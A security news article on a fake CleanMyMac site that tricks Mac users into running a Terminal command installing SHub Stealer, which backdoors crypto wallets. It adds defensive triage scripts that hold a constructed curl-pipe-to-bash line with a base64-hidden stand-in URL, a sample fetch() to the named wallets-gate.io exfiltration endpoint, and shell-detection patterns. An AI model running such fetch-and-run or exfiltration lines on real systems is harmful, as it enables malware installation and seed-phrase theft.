Cybercriminals Exploit Fake CleanMyMac Website to Deploy SHub Stealer and Compromise Cryptocurrency Wallets
Malicious actors have set up a counterfeit website imitating the popular Mac utility CleanMyMac to distribute a macOS infostealer known as SHub Stealer. The site, cleanmymacos[.]org, has no affiliation with the legitimate CleanMyMac software or its developer, MacPaw.
The Deceptive Mechanism
The attackers use ClickFix, a social-engineering technique in which the victim is talked into pasting and running a command themselves. Visitors to the fraudulent site are told to open the Terminal application and enter what is presented as a standard installation command. That command does three things:
1. Prints a lookalike MacPaw link so the output resembles a genuine installer.
2. Decodes a base64-encoded URL at run time, so the real download address never appears in the text the victim pastes.
3. Downloads a shell script from that URL and executes it.
Because the victim runs the command in their own Terminal session, the payload never passes through the checks that protect downloaded applications. A script fetched by a command-line tool does not carry the quarantine attribute that a browser download would, so Gatekeeper never assesses it and the XProtect scan that accompanies a Gatekeeper assessment never happens; notarization is irrelevant to a plain shell script. The instruction to open Terminal is therefore the warning sign: the step exists precisely to sidestep those protections.
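To make the three-step pattern concrete, here is an added triage script (not part of the original article and not taken from any published analysis of this campaign) that scans shell history lines for ClickFix-style commands. It flags lines that decode base64 at run time, fetch from the network and pipe the result into a shell, and it decodes every base64 token it finds so the hidden URL can be read. The history lines, the `macpaw.example` link and the `downloads.example.invalid` URL are constructed for the example; the real command served by the fake site is deliberately not reproduced.

```python
"""Added triage helper: find ClickFix-style install commands in shell history.

It flags lines that decode base64 at run time, fetch from the network and
pipe the result into a shell, and decodes any base64 tokens so the real
download URL becomes visible. Sample lines below are constructed.
"""
from __future__ import annotations

import base64
import re

PIPE_TO_SHELL = re.compile(r"\|\s*(?:sudo\s+)?(?:ba|z)?sh\b")      # ... | bash
BASE64_DECODE = re.compile(r"base64\s+(?:-d|-D|--decode)\b")         # base64 -D (macOS) / -d
FETCH_TOOL = re.compile(r"\b(?:curl|wget)\b")
B64_TOKEN = re.compile(r"[A-Za-z0-9+/]{16,}={0,2}")                  # long enough to hide a URL
URL = re.compile(r"https?://[^\s'\"]+")
ZSH_PREFIX = re.compile(r"^:\s*\d+:\d+;")                            # zsh EXTENDED_HISTORY stamp


def decoded_urls(line: str) -> list[str]:
    """Return every URL hidden inside base64 tokens on the line."""
    urls: list[str] = []
    for token in B64_TOKEN.findall(line):
        try:
            text = base64.b64decode(token, validate=True).decode("utf-8")
        except (ValueError, UnicodeDecodeError):
            continue  # not base64, or binary: nothing to read
        urls.extend(URL.findall(text))
    return urls


def score_line(line: str) -> tuple[int, list[str]]:
    """Heuristic score for one command line; higher is more ClickFix-like."""
    score, reasons = 0, []
    if PIPE_TO_SHELL.search(line):
        score += 2
        reasons.append("pipes output into a shell")
    if BASE64_DECODE.search(line):
        score += 2
        reasons.append("decodes base64 at run time")
    if FETCH_TOOL.search(line):
        score += 1
        reasons.append("fetches from the network")
    hidden = decoded_urls(line)
    if hidden:
        score += 2
        reasons.append("hidden URL(s): " + ", ".join(hidden))
    return score, reasons


def find_clickfix(history_lines, threshold: int = 4) -> list[tuple[str, int, list[str]]]:
    """Return (line, score, reasons) for each history line at or above the threshold."""
    hits = []
    for raw in history_lines:
        line = ZSH_PREFIX.sub("", raw.strip())
        score, reasons = score_line(line)
        if score >= threshold:
            hits.append((line, score, reasons))
    return hits


# Constructed sample history. The URL is hypothetical; the real site's command is
# not reproduced. The third line mirrors the three-step pattern described above:
# show a lookalike link, decode a hidden URL, fetch and run the script.
HIDDEN_URL = "https://downloads.example.invalid/setup.sh"
SAMPLE_HISTORY = [
    "ls -la ~/Library/LaunchAgents",
    "brew install jq",
    ": 1700000000:0;echo 'Installer: https://macpaw.example' && "
    f"echo {base64.b64encode(HIDDEN_URL.encode()).decode()} | base64 -D | xargs curl -fsSL | bash",
    "git pull --rebase",
]

if __name__ == "__main__":
    for line, score, reasons in find_clickfix(SAMPLE_HISTORY):
        print(f"[{score}] {line}\n      " + "; ".join(reasons))
```

Run it against `~/.zsh_history` (or `~/.bash_history`) on a machine you are triaging by passing the file's lines to `find_clickfix`; a hit whose decoded URL you do not recognise is the line to pull into the incident record. The scoring is a heuristic, so a `curl ... | sh` from a tool you installed on purpose will also score, which is why the reasons are reported alongside the score.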
Capabilities of SHub Stealer
Once installed, SHub Stealer performs the following:
– Data Harvesting: The malware collects sensitive information, including saved passwords, browser data, Keychain data, cryptocurrency wallet files, and Telegram session data.
– Geofencing Logic: Before running its main payload, SHub Stealer looks for a Russian-language keyboard layout among the enabled input sources (a layout check, not an IP-based location check). If one is present, it reports a `cis_blocked` event to the attackers' server and exits without stealing anything. This is a familiar pattern in crimeware that is meant to avoid infecting systems in Russia and neighbouring CIS countries, most likely to stay clear of local law enforcement.
– Per-Victim Tracking: The malware assigns a unique identifier to each infected host so the operators can track and task individual victims.
Targeting Cryptocurrency Wallets
A particularly alarming aspect of SHub Stealer is its ability to tamper with cryptocurrency wallet applications. The malware looks for specific wallet apps on the infected machine and replaces their application code with backdoored versions that look and behave normally but quietly exfiltrate credentials. The targeted applications are:
– Exodus
– Atomic Wallet
– Ledger Wallet
– Ledger Live
– Trezor Suite
These applications are built on Electron, which packages an app's JavaScript, HTML and other resources into a single archive, `app.asar`, stored inside the bundle at `Contents/Resources/app.asar`. SHub Stealer terminates the running wallet, downloads a modified `app.asar` from its command-and-control (C2) server, overwrites the original, strips the existing code signature and re-signs the bundle so macOS will launch it. The attackers do not hold the vendors' signing certificates, so the new signature cannot match the original developer's: running `codesign -dv --verbose=2` on the app and comparing the `Authority=` and `TeamIdentifier=` lines with a known-good install is a quick way to spot a tampered wallet.
Specific Attack Methods
– Exodus and Atomic Wallet: Configured to silently transmit the user’s password and seed phrase to `wallets-gate[.]io/api/injection` each time the wallet is unlocked.
– Ledger Wallet and Ledger Live: Disable TLS certificate validation at startup, then display a fake recovery wizard that collects the seed phrase and sends it to the same endpoint.
– Trezor Suite: Presents a full-screen overlay styled to match its real interface, prompting users with a fake security update that requests the seed phrase, validates it using the app’s own BIP39 library, and transmits it to the attackers.
All compromised applications exfiltrate data to the same `wallets-gate[.]io` endpoint using a consistent API key and build ID, indicating a single operator behind the attacks.
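As an added example (not the article's code, and not any wallet vendor's), the following script parses an `app.asar` archive, lists the files inside it, and reports which of them contain the exfiltration indicators named above. The archive layout it assumes is the electron/asar on-disk format: an 8-byte size pickle, a JSON header pickle, then file contents at the offsets the header records. The sample archive, including the `src/main.js` contents, is constructed in memory for the example; the `inspect_bundle` and `signing_authority` helpers are the ones you would point at a real `/Applications/<Wallet>.app`.

```python
"""Added triage helper for Electron wallet bundles: parse app.asar, list the
files inside, and report which contain the exfiltration indicators named in
the article. Archive layout follows the documented electron/asar format.
"""
from __future__ import annotations

import hashlib
import json
import shutil
import struct
import subprocess
from pathlib import Path

# Strings the article attributes to the backdoored wallets.
INDICATORS = (b"wallets-gate.io", b"/api/injection")


def build_asar(files: dict[str, bytes]) -> bytes:
    """Build a minimal asar archive from {path: bytes}; used to construct the sample."""
    root: dict = {"files": {}}
    blobs, offset = [], 0
    for path, data in files.items():
        node = root
        *dirs, name = path.split("/")
        for d in dirs:
            node = node["files"].setdefault(d, {"files": {}})
        node["files"][name] = {"size": len(data), "offset": str(offset)}
        blobs.append(data)
        offset += len(data)
    header_json = json.dumps(root).encode()
    padded = (len(header_json) + 3) & ~3                      # pickle pads strings to 4 bytes
    header_payload = struct.pack("<I", len(header_json)) + header_json.ljust(padded, b"\0")
    header_pickle = struct.pack("<I", len(header_payload)) + header_payload
    size_pickle = struct.pack("<II", 4, len(header_pickle))
    return size_pickle + header_pickle + b"".join(blobs)


def parse_asar(data: bytes) -> tuple[dict, int]:
    """Return (header dict, absolute offset where file contents begin)."""
    _, header_size = struct.unpack_from("<II", data, 0)        # uint32 4, uint32 header size
    json_len = struct.unpack_from("<I", data, 12)[0]           # payload-size field sits at 8
    header = json.loads(data[16:16 + json_len])
    return header, 8 + header_size


def walk(node: dict, prefix: str = ""):
    """Yield (path, entry) for every file entry in the header, depth first."""
    for name, entry in node.get("files", {}).items():
        path = f"{prefix}/{name}" if prefix else name
        if "files" in entry:
            yield from walk(entry, path)
        else:
            yield path, entry


def scan_asar(data: bytes) -> dict[str, list[str]]:
    """Map each file path to the indicators found in its bytes (only files with hits)."""
    header, base = parse_asar(data)
    hits: dict[str, list[str]] = {}
    for path, entry in walk(header):
        start = base + int(entry["offset"])
        blob = data[start:start + int(entry["size"])]
        found = [i.decode() for i in INDICATORS if i in blob]
        if found:
            hits[path] = found
    return hits


def inspect_bundle(app_path: str) -> tuple[str, dict[str, list[str]]]:
    """Hash and scan the app.asar of a real bundle, e.g. /Applications/Exodus.app."""
    data = (Path(app_path) / "Contents" / "Resources" / "app.asar").read_bytes()
    return hashlib.sha256(data).hexdigest(), scan_asar(data)


def signing_authority(app_path: str) -> list[str]:
    """On macOS, return codesign's Authority= and TeamIdentifier= lines (it prints to stderr)."""
    if shutil.which("codesign") is None:
        return []
    proc = subprocess.run(["codesign", "-dv", "--verbose=2", app_path],
                          capture_output=True, text=True)
    return [line for line in proc.stderr.splitlines()
            if line.startswith(("Authority=", "TeamIdentifier="))]


# Constructed sample: a tiny "wallet" whose main process contains the C2 call.
SAMPLE_FILES = {
    "package.json": b'{"name":"wallet","main":"src/main.js"}',
    "src/main.js": b"fetch('https://wallets-gate.io/api/injection', {method:'POST'});\n",
    "src/ui.js": b"export const title = 'Wallet';\n",
}
SAMPLE_ASAR = build_asar(SAMPLE_FILES)

if __name__ == "__main__":
    print(hashlib.sha256(SAMPLE_ASAR).hexdigest())
    print(scan_asar(SAMPLE_ASAR))
```

The hash returned by `inspect_bundle` is worth recording even when the indicator scan is empty: compared against the `app.asar` from a fresh download of the same version, it tells you whether the archive was replaced at all, which matters because a future build of the backdoor need not keep the same domain. `signing_authority` returns nothing on non-macOS hosts, so the parsing and scanning parts run anywhere you copy the archive to.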
Establishing Persistent Access
To keep long-term access to infected systems, SHub Stealer installs a launchd agent, `com.google.keystone.agent.plist`, in `~/Library/LaunchAgents/`, borrowing the label of Google's Keystone updater so the entry looks routine. launchd starts it every sixty seconds, giving the operators a recurring beacon through which they can run commands on the host.
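An added example (not from the article) that inspects a LaunchAgent plist and separates the impersonation described above from Google's genuine Keystone agent, which uses the same label in the same folder. The rule that the legitimate program lives under `~/Library/Google/GoogleSoftwareUpdate/` is my assumption about the normal Keystone layout, not a statement from the article; the `GoogleUpdate.app` path and the sixty-second interval are the ones the article gives, and both sample plists are constructed.

```python
"""Added triage helper: tell Google's real Keystone LaunchAgent apart from a
plist that borrows its label. The 'legitimate path' rule is an assumption
about where the genuine updater lives, not a statement from the article.
"""
from __future__ import annotations

import os
import plistlib

LEGIT_PROGRAM_DIR = "/Library/Google/GoogleSoftwareUpdate/"                   # assumed Keystone home
SUSPECT_PROGRAM_DIR = "/Library/Application Support/Google/GoogleUpdate.app"  # named by the article
SHELLS = {"sh", "bash", "zsh"}


def assess_launch_agent(plist_bytes: bytes) -> list[str]:
    """Return findings for one LaunchAgent plist; an empty list means nothing suspicious."""
    p = plistlib.loads(plist_bytes)
    findings: list[str] = []
    label = p.get("Label", "")
    args = list(p.get("ProgramArguments") or [p.get("Program", "")])
    program = args[0]
    if label.startswith("com.google.keystone") and LEGIT_PROGRAM_DIR not in program:
        findings.append(f"label {label!r} but program is {program!r}, not the Keystone agent")
    if SUSPECT_PROGRAM_DIR in program:
        findings.append("program lives in the support folder the article ties to SHub Stealer")
    interval = p.get("StartInterval")
    if isinstance(interval, int) and interval <= 60:
        findings.append(f"StartInterval of {interval}s is far shorter than an updater needs")
    if os.path.basename(program) in SHELLS or "-c" in args:
        findings.append("agent launches a shell command rather than a binary")
    return findings


def scan_launch_agents(directory: str) -> dict[str, list[str]]:
    """Assess every .plist in a LaunchAgents folder, e.g. ~/Library/LaunchAgents."""
    results: dict[str, list[str]] = {}
    for entry in os.scandir(os.path.expanduser(directory)):
        if entry.is_file() and entry.name.endswith(".plist"):
            with open(entry.path, "rb") as fh:
                try:
                    findings = assess_launch_agent(fh.read())
                except plistlib.InvalidFileException:
                    findings = ["not a valid plist"]
            if findings:
                results[entry.path] = findings
    return results


# Constructed samples (paths are illustrative, not copied from any real system).
HOME = "/Users/victim"
LEGIT_SAMPLE = plistlib.dumps({
    "Label": "com.google.keystone.agent",
    "ProgramArguments": [
        HOME + "/Library/Google/GoogleSoftwareUpdate/GoogleSoftwareUpdate.bundle/"
        "Contents/Resources/GoogleSoftwareUpdateAgent.app/Contents/MacOS/GoogleSoftwareUpdateAgent",
        "-runMode", "ifneeded",
    ],
    "StartInterval": 3600,
})
MALICIOUS_SAMPLE = plistlib.dumps({
    "Label": "com.google.keystone.agent",
    "ProgramArguments": [
        HOME + "/Library/Application Support/Google/GoogleUpdate.app/Contents/MacOS/GoogleUpdate",
    ],
    "RunAtLoad": True,
    "StartInterval": 60,
})

if __name__ == "__main__":
    print("genuine-looking:", assess_launch_agent(LEGIT_SAMPLE))
    print("impostor:", assess_launch_agent(MALICIOUS_SAMPLE))
```

`scan_launch_agents("~/Library/LaunchAgents")` gives a per-file list of findings for the folder the article names; an empty result for the Keystone plist means it points into Google's own directory and keeps a normal interval, which is the case where deleting it would only break Chrome updates.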
Immediate Actions for Affected Users
If you visited cleanmymacos[.]org and were shown the Terminal command, take the following steps immediately:
1. Cease Further Actions: If you have not yet run the command, do not proceed; close the page.
2. Remove the Malicious Launch Agent: Google's genuine Keystone updater installs a plist with the same label, `com.google.keystone.agent`, in the same `~/Library/LaunchAgents/` folder, so do not delete the file on its name alone. Open it and check `ProgramArguments`: the genuine agent launches `GoogleSoftwareUpdateAgent` from `~/Library/Google/GoogleSoftwareUpdate/`, whereas a copy that points anywhere else (in particular into `~/Library/Application Support/Google/GoogleUpdate.app`) or that has a `StartInterval` of 60 is the implant. Unload it with `launchctl bootout gui/$(id -u)/com.google.keystone.agent`, then delete the plist.
3. Delete Malicious Application Support Files: Check `~/Library/Application Support/Google/` and remove the `GoogleUpdate.app` folder if present.
4. Secure Cryptocurrency Assets: If any of the targeted wallet applications was installed when the command ran, treat the seed phrase as compromised. For Exodus and Atomic Wallet the backdoor captures the seed from the app itself; for Ledger and Trezor the seed only leaves the hardware device if you typed it into the fake recovery wizard or update prompt, but if you did, it is in the attackers' hands. A seed phrase cannot be rotated, so move funds to a new wallet created on a clean device, and reinstall the wallet application from the vendor's official site rather than keeping the tampered copy.
5. Change Credentials: From a trusted device, change your macOS login password and every credential stored in the Keychain, and terminate all other Telegram sessions, since the session data was harvested.
6. Revoke and Regenerate Keys: Revoke and regenerate any API keys, tokens, or SSH keys that were stored on the machine or appear in your shell history files.
Conclusion
This incident underscores the need for care when downloading software and running commands from unverified sources. Check that you are on the vendor's official site, and treat any installation prompt that asks you to paste a command into Terminal with suspicion: that step is there to sidestep the protections macOS applies to downloaded applications.